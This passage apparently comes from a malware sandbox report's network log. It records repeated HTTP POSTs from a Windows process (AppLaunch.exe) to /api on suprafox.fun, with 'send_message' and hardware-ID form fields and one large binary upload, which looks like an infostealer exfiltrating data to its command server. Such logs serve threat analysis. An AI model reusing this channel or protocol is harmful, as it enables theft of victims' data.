{"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=R4Clq%2BoUhcVwjG1EKl6osZnbPObSPswVYEkuITM%2FASLJjmzfUiWzpEV6cLsiDvc0dFAaCie3N8U91jENdtQ3u1vkj4pN4poWYbJVu%2B1gx8brXUMvsnoKBJNbrZofU5s%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 81ad4968d87a2d1a-IAD Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Oct 24, 2023 00:06:22.013528109 CEST	163	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
28	192.168.2.4	49767	104.21.92.91	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Timestamp	kBytes transferred	Direction	Data
Oct 24, 2023 00:06:22.174597979 CEST	163	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 Cookie: __cf_mw_byp=N4hQtCEPMp.xG56yhPh3atIUoRF_guPEAa.58z6Jm6M-1698098764-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Length: 535 Host: suprafox.fun
Oct 24, 2023 00:06:22.175769091 CEST	164	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"45DCC006916375A84E5F84BCE7A7479D9DCC3556--SqDe87817huf871793q74Content-Disposition
Oct 24, 2023 00:06:22.639669895 CEST	165	IN	HTTP/1.1 200 OK Date: Mon, 23 Oct 2023 22:06:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=u698rb3u3c28qniehvukbft5s7; expires=Fri, 16 Feb 2024 15:53:01 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Fri, 22 Dec 2023 22:06:22 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ysBjbAGS7LrxVRTVAiXgFhU3GCUfSx2r13lxAhD2kkZrfYGw%2BifJbWvDg3h7SOw0fNPR%2BTgdI4HNpV%2FgZxE3GmqYQ87XMOR5V1ozthtsFZxx0yQgTfFtuoE2FOkr%2B4M%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 81ad496cce035767-IAD Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Oct 24, 2023 00:06:22.639708042 CEST	165	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
29	192.168.2.4	49768	104.21.92.91	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Timestamp	kBytes transferred	Direction	Data
Oct 24, 2023 00:06:22.938721895 CEST	166	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 Cookie: __cf_mw_byp=N4hQtCEPMp.xG56yhPh3atIUoRF_guPEAa.58z6Jm6M-1698098764-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Length: 20468 Host: suprafox.fun
Oct 24, 2023 00:06:22.939910889 CEST	177	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"45DCC006916375A84E5F84BCE7A7479D9DCC3556--SqDe87817huf871793q74Content-Disposition
Oct 24, 2023 00:06:23.031896114 CEST	179	OUT	Data Raw: a0 b7 6d ec af d7 13 65 3b eb 86 6b 7c 99 d9 ef 59 b2 d3 79 eb 41 f2 6a 2e fa c0 bc bd 7b c3 59 a9 1d df 7f 5a eb bb ee 3a 6f 67 0e f5 3b d8 cd 95 36 76 1a 97 98 ec ba a2 17 06 db f3 9c db d8 7f 9f d5 cd f5 eb 7a cb a5 5d 5d d6 e7 b3 d1 23 53 af Data Ascii: me;k\|YyAj.{YZ:og;6vz]]#SZCjrVxcG#ke3Q_}GD6euZvcO">3'G6gu:'Gi~f~4?Tvd}K~;j4Y{<vo}j+RXz
Oct 24, 2023 00:06:23.033737898 CEST	187	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7e e6 0d a5 06 12 bb 6e 99 fd cc e1 b3 d9 f6 db cc 4d bf 76 39 d3 7e fb d0 bd 7f fd b9 81 f6 db c7 16 5e 78 30 dd 7e fb e1 57 3f f0 a1 54 fb ed 57 0b 57 be 91 cc a5 06 72 bb Data Ascii: ~nMv9~^x0~W?TWWrn4A"Q5'1W-+/^8+1+1uZuqYIFo?~?n(
Oct 24, 2023 00:06:23.552362919 CEST	188	IN	HTTP/1.1 200 OK Date: Mon, 23 Oct 2023 22:06:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=59on3htg0b5u9b6tlfva0q7r62; expires=Fri, 16 Feb 2024 15:53:02 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Fri, 22 Dec 2023 22:06:23 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=LXTxi9IqiD6ow27EyFLAwEIk0jFiy5Iaw%2BzZ0MWjJ5KGoIBD%2Fu20FFlJQF8RzIFPbEqgqegFpdggn4q8L1mrhiec4%2FgDs8c%2Bew2Pjgx15UC1MxBc20cpqSS0mdj%2BHRc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 81ad49719ffa2421-IAD Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Oct 24, 2023 00:06:23.552388906 CEST	188	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.4	49741	104.21.92.91	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Timestamp	kBytes transferred	Direction	Data
Oct 24, 2023 00:06:05.884090900 CEST	31	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 Cookie: __cf_mw_byp=N4hQtCEPMp.xG56yhPh3atIUoRF_guPEAa.58z6Jm6M-1698098764-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Length: 535 Host: suprafox.fun
Oct 24, 2023 00:06:05.885238886 CEST	32	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"45DCC006916375A84E5F84BCE7A7479D9DCC3556--SqDe87817huf871793q74Content-Disposition
Oct 24, 2023 00:06:06.299288988 CEST	33	IN	HTTP/1.1 200 OK Date: Mon, 23 Oct 2023 22:06:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=ok6t6kjrbpphodh8o3autjvj7h; expires=Fri, 16 Feb 2024 15:52:45 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Fri, 22 Dec 2023 22:06:06 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=yAA6FXOnzirVw0S8k3tXx4d8pWWQI6TfEpUebHiIux%2Bxyq1Nhto7FGgK9S%2FPmx1uamUc%2FugencT%2Fvtrxd6ux5CrObjm8yMwFMJV7IcMaoPTMogzxlW3agzJxB3COe%2Fo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 81ad4906fc2f0831-IAD Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Oct 24, 2023 00:06:06.299313068 CEST	33	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
30	192.168.2.4	49769	104.21.92.91	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Timestamp	kBytes transferred	Direction	Data
Oct 24, 2023 00:06:39.731770039 CEST	191	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 Cookie: __cf_mw_byp=N4hQtCEPMp.xG56yhPh3atIUoRF_guPEAa.58z6Jm6M-1698098764-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Length: 535 Host: suprafox.fun
Oct 24, 2023 00:06:39.732667923 CEST	191	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"45DCC006916375A84E5F84BCE7A7479D9DCC3556--SqDe87817huf871793q74Content-Disposition
Oct 24, 2023 00:06:40.155925989 CEST	193	IN	HTTP/1.1 200 OK Date: Mon, 23 Oct 2023 22:06:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=poi3qnko34af5tnidkolf79qdh; expires=Fri, 16 Feb 2024 15:53:19 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Fri, 22 Dec 2023 22:06:40 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=pTkruuNGcaKmL9IXyIGlj%2BIQmmmHfE%2BKkFsvOZWIkdbb8lwS8ysMfBTj2Pds7plp9xs5AMrJev3%2BA5x%2FGpko7bIXrfKFYAgs9BruCcVNhmFC61nOC%2F01NYMob8H7W0s%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 81ad49da8f64201b-IAD Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Oct 24, 2023 00:06:40.155950069 CEST	193	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
31	192.168.2.4	49770	104.21.92.91	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Timestamp	kBytes transferred	Direction	Data
Oct 24, 2023 00:06:40.317655087 CEST	194	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 Cookie: __cf_mw_byp=N4hQtCEPMp.xG56yhPh3atIUoRF_guPEAa.58z6Jm6M-1698098764-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Length: 535 Host: suprafox.fun
Oct 24, 2023 00:06:40.320360899 CEST	194	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"45DCC006916375A84E5F84BCE7A7479D9DCC3556--SqDe87817huf871793q74Content-Disposition
Oct 24, 2023 00:06:40.613431931 CEST	196	IN	HTTP/1.1 200 OK Date: Mon, 23 Oct 2023 22:06:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=51ftukhueeja46b9qdnd8oa623; expires=Fri, 16 Feb 2024 15:53:19 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Fri, 22 Dec 2023 22:06:40 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2FoGMSF25ajEMxVnLxMwWnc39M8SxAYmYThIlfLieVHiCm5hdgBpI%2Bg2KtBOGOkm03biU3sEFahYf%2Bw8r4rLdrHJ9U8%2BvvZDfCbACYOzxleisfSduQ3mA8FXJSpD6d%2FY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 81ad49de39ab6fc7-IAD Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Oct 24, 2023 00:06:40.613487959 CEST	196	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
32	192.168.2.4	49771	104.21.92.91	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Timestamp	kBytes transferred	Direction	Data
Oct 24, 2023 00:06:40.754017115 CEST	196	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 Cookie: __cf_mw_byp=N4hQtCEPMp.xG56yhPh3atIUoRF_guPEAa.58z6Jm6M-1698098764-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Length: 535 Host: suprafox.fun
Oct 24, 2023 00:06:40.755589962 CEST	197	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"45DCC006916375A84E5F84BCE7A7479D9DCC3556--SqDe87817huf871793q74Content-Disposition
Oct 24, 2023 00:06:41.056915045 CEST	198	IN	HTTP/1.1 200 OK Date: Mon, 23 Oct 2023 22:06:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=0jmt1hbcqb25u8668tb83qh7dk; expires=Fri, 16 Feb 2024 15:53:19 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Fri, 22 Dec 2023 22:06:40 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=P%2BSuMZ6UbaLk6O4jgQM1e3ApSmuGaQcygXO2yCguXAlAIwBs6yndLbvWQrTPUo5LX92gzPZX0wUxbaOkIC6jQlJhW67IKoZwwRXrVdLw8mQ%2FOZ2FGRt8QcyI7pklC4w%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 81ad49e0e8f90817-IAD Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Oct 24, 2023 00:06:41.056971073 CEST	198	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
33	192.168.2.4	49772	104.21.92.91	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Timestamp	kBytes transferred	Direction	Data
Oct 24, 2023 00:06:41.169070959 CEST	199	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 Cookie: __cf_mw_byp=N4hQtCEPMp.xG56yhPh3atIUoRF_guPEAa.58z6Jm6M-1698098764-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Length: 535 Host: suprafox.fun
Oct 24, 2023 00:06:41.170149088 CEST	200	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"45DCC006916375A84E5F84BCE7A7479D9DCC3556--SqDe87817huf871793q74Content-Disposition
Oct 24, 2023 00:06:41.577984095 CEST	201	IN	HTTP/1.1 200 OK Date: Mon, 23 Oct 2023 22:06:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=5o1m7aobo999ms933o8t3kuus2; expires=Fri, 16 Feb 2024 15:53:20 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Fri, 22 Dec 2023 22:06:41 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=AnNDZD2FwmEKi4GT8nZmQpnDKpbKQs%2BQQQm8GS3VglnVy8dKQMB0MI2%2F4wBA%2FnLqTLP32PXjrarW8kvH%2Fha2DmEbZSwMgBFWOSFHv2kBmxEdAMaXM1P2A2GCT2g%2B2NA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 81ad49e388612d27-IAD Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Oct 24, 2023 00:06:41.578036070 CEST	201	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
34	192.168.2.4	49773	104.21.92.91	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Timestamp	kBytes transferred	Direction	Data
Oct 24, 2023 00:06:41.723772049 CEST	202	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 Cookie: __cf_mw_byp=N4hQtCEPMp.xG56yhPh3atIUoRF_guPEAa.58z6Jm6M-1698098764-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Length: 535 Host: suprafox.fun
Oct 24, 2023 00:06:41.726418972 CEST	202	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"45DCC006916375A84E5F84BCE7A7479D9DCC3556--SqDe87817huf871793q74Content-Disposition
Oct 24, 2023 00:06:42.142965078 CEST	204	IN	HTTP/1.1 200 OK Date: Mon, 23 Oct 2023 22:06:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=dl8be3mnn98nioq0r8urbq2dcd; expires=Fri, 16 Feb 2024 15:53:20 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Fri, 22 Dec 2023 22:06:41 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vdSXY58pNVGNedgDFFvCpIL0K5NSoQcWeOpkkBlQUv8G5%2BDzem71FrAU47e1sbHRCzB9w4f6s0bh6hZ%2Br45MgZMtQQecgXZbDFd%2BabayQrm%2F7SzgDJlM62CS7zkXxUY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 81ad49e6fa333b26-IAD Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Oct 24, 2023 00:06:42.143019915 CEST	204	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
35	192.168.2.4	49774	104.21.92.91	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Timestamp	kBytes transferred	Direction	Data
Oct 24, 2023 00:06:42.274557114 CEST	204	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 Cookie: __cf_mw_byp=N4hQtCEPMp.xG56yhPh3atIUoRF_guPEAa.58z6Jm6M-1698098764-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Length: 535 Host: suprafox.fun
Oct 24, 2023 00:06:42.275947094 CEST	205	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"45DCC006916375A84E5F84BCE7A7479D9DCC3556--SqDe87817huf871793q74Content-Disposition
Oct 24, 2023 00:06:42.701024055 CEST	207	IN	HTTP/1.1 200 OK Date: Mon, 23 Oct 2023 22:06:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=7utsm0bbck0t2p6olljsehg6ao; expires=Fri, 16 Feb 2024 15:53:21 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Fri, 22 Dec 2023 22:06:42 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Tl%2BQ6h3qN3dT4nALvsppPGAiESXZxcLoSRpV1O%2FRSF%2Bfpcqw6RzhilUqsvlakeWEVJpeKTaXNU%2F7TBrw6eRaTAKpSr2DfAu7%2BGE%2FwcJue8PqT7%2Bn4CtJvmvtsKvMKTc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 81ad49ea68cb2427-IAD Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Oct 24, 2023 00:06:42.701081991 CEST	207	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
36	192.168.2.4	49775	104.21.92.91	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Timestamp	kBytes transferred	Direction	Data
